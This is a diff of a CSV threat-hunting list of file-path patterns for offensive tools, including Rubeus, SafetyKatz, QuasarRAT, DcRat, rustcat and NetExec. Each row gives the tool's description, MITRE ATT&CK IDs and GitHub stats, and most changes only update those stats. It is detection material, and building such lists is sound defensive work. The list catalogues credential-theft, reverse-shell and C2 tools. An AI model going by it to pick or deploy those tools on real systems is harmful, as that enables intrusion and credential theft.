T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\pywsus.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*\Quasar.v*.zip*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*\Quasar-master*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. 
Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*\Ransomware.exe","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*\Quasar.v*.zip*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*\Quasar-master*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. 
Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*\Ransomware.exe","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*\rarce.py*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*\rasman.exe*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*\RasmanPotato*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*\ratchatPT.go*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" 
 "*\ratchatPT.syso*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
+"*\rcat-v*-win-x86_64.exe*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z"
+"*\rdcman.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\rdp.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*\RDPCredsStealerDLL*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z"
-"*\Reaper\Reaper.cpp*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z"
-"*\Reaper-main\*.sys*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z"
-"*\REC2-main.zip*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
-"*\Recon.tests.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
-"*\RecycledGate.c*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","0","N/A","N/A","3","213","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z"
-"*\RedPersist.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
-"*\RedPersist.pdb*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
-"*\RedPersist.sln*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
-"*\RedPersist-main\*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
-"*\RemoteCamera.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z"
-"*\Resources\Disks-NoEncryption.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*\Reaper\Reaper.cpp*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z"
+"*\Reaper-main\*.sys*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z"
+"*\REC2-main.zip*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*\Recon.tests.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*\RecycledGate.c*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","0","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z"
+"*\RedPersist.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
+"*\RedPersist.pdb*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
+"*\RedPersist.sln*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
+"*\RedPersist-main\*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
+"*\reg-query.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\RemoteCamera.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z"
+"*\Resources\Disks-NoEncryption.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
 "*\resources\PROCEXP.sys*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z"
-"*\ROADtools\*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1353","206","2023-09-27T08:30:55Z","2020-03-28T09:56:08Z"
+"*\ROADtools\*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z"
 "*\rpcrt.py","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z"
 "*\rpt_win.exe","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
 "*\rsocx.exe*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z"
-"*\Rubeus.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
-"*\Rubeus\*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
-"*\ruler.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z"
-"*\run\john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*\run\john\*.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*\run\john\*.com*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*\run\john\*.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*\run\john\*.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*\Rubeus.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*\Rubeus\*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*\ruler.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z"
+"*\run\john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*\run\john\*.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*\run\john\*.com*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*\run\john\*.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*\run\john\*.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*\RunasCs.cs*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z"
+"*\runasppl.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*\RunBOF.exe*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z"
 "*\RunOF.exe*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z"
 "*\RunOF\bin\*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z"
 "*\rusthound.exe*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z"
 "*\SafetyKatz*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","0","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z"
